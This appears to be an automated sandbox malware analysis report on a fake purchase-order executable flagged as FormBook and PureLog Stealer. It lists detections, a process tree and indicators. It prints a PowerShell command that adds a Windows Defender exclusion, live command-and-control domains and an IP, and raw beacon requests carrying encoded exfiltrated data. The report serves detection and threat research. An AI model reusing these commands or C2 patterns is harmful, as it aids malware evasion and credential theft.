Edit tour

Windows Analysis Report
PO-000172483 pdf.exe

Overview

General Information

Sample name:	PO-000172483 pdf.exe
Analysis ID:	1585888
MD5:	129fde986d0f28d1d4dc333fd8a97478
SHA1:	49c21bd7147370d2d6c751c9f3b4cb02077df6ed
SHA256:	2143e9fe2cf7658859b05fb300e58e293da9f0872219ff8e00bfa80435534378
Tags:	exeuser-TeamDreier
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PO-000172483 pdf.exe (PID: 5980 cmdline: "C:\Users\user\Desktop\PO-000172483 pdf.exe" MD5: 129FDE986D0F28D1D4DC333FD8A97478)

powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO-000172483 pdf.exe (PID: 4196 cmdline: "C:\Users\user\Desktop\PO-000172483 pdf.exe" MD5: 129FDE986D0F28D1D4DC333FD8A97478)

PO-000172483 pdf.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\PO-000172483 pdf.exe" MD5: 129FDE986D0F28D1D4DC333FD8A97478)

PO-000172483 pdf.exe (PID: 5488 cmdline: "C:\Users\user\Desktop\PO-000172483 pdf.exe" MD5: 129FDE986D0F28D1D4DC333FD8A97478)

ycnUEzgloE.exe (PID: 1896 cmdline: "C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cttune.exe (PID: 6948 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)

ycnUEzgloE.exe (PID: 3964 cmdline: "C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

WMIADAP.exe (PID: 6544 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.3289765947.00000000047C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2090320439.0000000008FB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2082693969.0000000003D95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3289827592.0000000004810000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2611689620.0000000001600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2612889550.0000000003860000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: PO-000172483 pdf.exe PID: 5980	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.PO-000172483 pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PO-000172483 pdf.exe.8fb0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-000172483 pdf.exe.3dd70b8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-000172483 pdf.exe.3db7098.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.PO-000172483 pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-000172483 pdf.exe", ParentImage: C:\Users\user\Desktop\PO-000172483 pdf.exe, ParentProcessId: 5980, ParentProcessName: PO-000172483 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe", ProcessId: 3180, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-000172483 pdf.exe", ParentImage: C:\Users\user\Desktop\PO-000172483 pdf.exe, ParentProcessId: 5980, ParentProcessName: PO-000172483 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe", ProcessId: 3180, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T12:49:37.048599+0100	2856318	1	A Network Trojan was detected	192.168.2.5	57576	194.9.94.85	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO-000172483 pdf.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: PO-000172483 pdf.exe	Virustotal: Detection: 38%			Perma Link
Source: PO-000172483 pdf.exe	ReversingLabs: Detection: 52%

Yara detected FormBook

Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3289765947.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3289827592.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2611689620.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2612889550.0000000003860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO-000172483 pdf.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Unpacked PE file: 0.2.PO-000172483 pdf.exe.120000.0.unpack

Source: PO-000172483 pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO-000172483 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cttune.pdb source: PO-000172483 pdf.exe, 00000007.00000002.2611351967.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000003.2558978346.0000000000FCB000.00000004.00000001.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288709951.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cttune.pdbGCTL source: PO-000172483 pdf.exe, 00000007.00000002.2611351967.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000003.2558978346.0000000000FCB000.00000004.00000001.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288709951.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ycnUEzgloE.exe, 0000000A.00000000.2522172349.0000000000A8E000.00000002.00000001.01000000.0000000C.sdmp, ycnUEzgloE.exe, 0000000C.00000000.2685844897.0000000000A8E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO-000172483 pdf.exe, 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2611330271.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2613954732.0000000004891000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-000172483 pdf.exe, PO-000172483 pdf.exe, 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2611330271.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2613954732.0000000004891000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\cttune.exe

Code function: 11_2_00A8C870 FindFirstFileW,FindNextFileW,FindClose,

11_2_00A8C870

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_0251E469
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_0251AFF4
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 4x nop then xor eax, eax	11_2_00A79DF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 4x nop then mov ebx, 00000004h	11_2_04D904E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:57576 -> 194.9.94.85:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.tabyscooterrentals.xyz

Source: global traffic

TCP traffic: 192.168.2.5:57323 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 194.9.94.85 194.9.94.85

Source: Joe Sandbox View

ASN Name: LOOPIASE LOOPIASE

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /4wxo/?9DQxz=BXUp_jixat&oVUxTLO=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npNZet2wbij5DqF2t6l2aiyaCaN+prATVQbgFOC5sVP+ADg== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.tabyscooterrentals.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Source: global traffic	HTTP traffic detected: GET /2j93/?oVUxTLO=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt63bn0dOTASaMNZTI5trmrdZ8L/Alw25M+Xf5hGL6nvcNQQ==&9DQxz=BXUp_jixat HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Source: global traffic	HTTP traffic detected: GET /1lpi/?oVUxTLO=XO6lNaUCtrQGcU2VODzQ73da62+/1UDsd9ytkxpugSckEiM1CKodZj4VrjBa4PsrlwO68eKRpavYImQlE0qwziVyxSffRIbkHLMEPAX10bxXVuSg8lNjbht32mQfRiSCPg==&9DQxz=BXUp_jixat HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.jyshe18.buzzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)

Source: global traffic	DNS traffic detected: DNS query: www.tabyscooterrentals.xyz
Source: global traffic	DNS traffic detected: DNS query: www.ftaane.net
Source: global traffic	DNS traffic detected: DNS query: www.milp.store
Source: global traffic	DNS traffic detected: DNS query: www.vavada-official.buzz
Source: global traffic	DNS traffic detected: DNS query: www.jyshe18.buzz

Source: unknown

HTTP traffic detected: POST /2j93/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 208Connection: closeHost: www.milp.storeOrigin: http://www.milp.storeReferer: http://www.milp.store/2j93/User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)Data Raw: 6f 56 55 78 54 4c 4f 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 75 64 75 53 32 53 74 2f 4a 6b 4e 6e 30 59 49 61 75 6c 58 2f 4f 36 4a 4a 32 2f 38 6a 69 73 4b 37 6c 7a 66 37 56 67 49 3d Data Ascii: oVUxTLO=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBuduS2St/JkNn0YIaulX/O6JJ2/8jisK7lzf7VgI=

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 Jan 2025 11:49:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-08T11:49:17.2881051Z

Source: PO-000172483 pdf.exe, 00000000.00000002.2079293199.000000000295A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: ycnUEzgloE.exe, 0000000C.00000002.3289330065.000000000093C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jyshe18.buzz
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005B7C000.00000004.10000000.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.000000000320C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.jyshe18.buzz/
Source: ycnUEzgloE.exe, 0000000C.00000002.3289330065.000000000093C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jyshe18.buzz/1lpi/
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cttune.exe, 0000000B.00000002.3288581704.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cttune.exe, 0000000B.00000003.2793476982.0000000007F11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: cttune.exe, 0000000B.00000002.3292470339.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
